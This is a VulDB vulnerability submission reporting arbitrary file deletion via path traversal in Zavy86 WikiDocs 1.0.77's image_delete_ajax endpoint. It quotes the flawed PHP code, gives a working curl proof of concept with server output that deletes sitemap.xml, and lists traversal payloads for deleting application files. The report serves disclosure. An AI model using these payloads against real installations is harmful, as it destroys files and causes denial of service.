Invia #609096: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversalinformazioni

TitoloZavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal
DescrizioneThe image_delete_ajax() endpoint in submit.php improperly concatenates user‐supplied filenames to its document directory without sanitization or canonicalization, allowing an authenticated administrator to delete any file on disk that the web server user can write, via a simple path‐traversal payload. Affected Component File: submit.php?act=image_delete_ajax Function: image_delete_ajax() Authentication: Requires session authentication level 2 (administrator) Technical Details $document = $_POST['document']; $image_filename = $_POST['image_name']; ... $DOC = new Document($document); if(!is_dir($DOC->DIR)){ mkdir($DOC->DIR,0755,true); } $filename = $DOC->DIR . $image_filename; if (file_exists($filename)) { $image_deleted = unlink($filename); } An admin can supply image_name=../../sensitive.php (or any file) and have it deleted. Proof of Concept (PoC): ┌──(root㉿kali)-[/home/kali] └─# curl http://127.0.0.1/sitemap.xml <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://127.0.0.1/</loc> <lastmod>1970-01-01T00:00:00+00:00</lastmod> </url> <url> <loc>http://127.0.0.1/opt</loc> <lastmod>1970-01-01T00:00:00+00:00</lastmod> </url> </urlset> ┌──(root㉿kali)-[/home/kali] └─# curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1' -H $'Content-Length: 38' -H $'Cache-Control: max-age=0' -H $'sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"' -H $'sec-ch-ua-mobile: ?0' -H $'sec-ch-ua-platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Origin: http://127.0.0.1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Referer: http://127.0.0.1/apidocs/com/sap/engine/deploy/manager/scripts/initializations.js?auth' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \ -b $'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \ --data-binary $'document=&image_name=../../sitemap.xml' \ $'http://127.0.0.1/submit.php?act=image_delete_ajax' HTTP/1.1 200 OK Date: Fri, 04 Jul 2025 08:15:44 GMT Server: Apache/2.4.62 (Unix) X-Powered-By: PHP/8.3.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 120 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"} ┌──(root㉿kali)-[/home/kali] └─# curl http://127.0.0.1/sitemap.xml <!DOCTYPE html> <html lang="en"> <head> ... 404 page ... Delete application code (DoS): document=&image_name=../../index.php document=&image_name=../../classes/Session.class.php CVSS v3.1 Assessment Attack Vector (AV): Network Attack Complexity (AC): Low Privileges Required (PR): High (administrator session) User Interaction (UI): None Scope (S): Unchanged Confidentiality (C): None Integrity (I): Low/High (arbitrary file deletion) Availability (A): High (application DoS) If "Integrity Low" is assumed (i.e. only non‐critical files), the score would be 5.5; however the ability to delete may source files could justify I:H. Application Setup: docker run -d -p 80:80 zavy86/wikidocs References: https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh Credits Discovered by Matan Sandori
Utente
 MatanS (UID 86894)
Sottomissione04/07/2025 10:38 (12 mesi fa)
Moderazione13/07/2025 09:28 (9 days later)
StatoAccettato
Voce VulDB316273 [Zavy86 WikiDocs fino a 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax directory traversal]
Punti17

PrecedenteVisione D'ensembleIl prossimo

Want to know what is going to be exploited?

We predict KEV entries!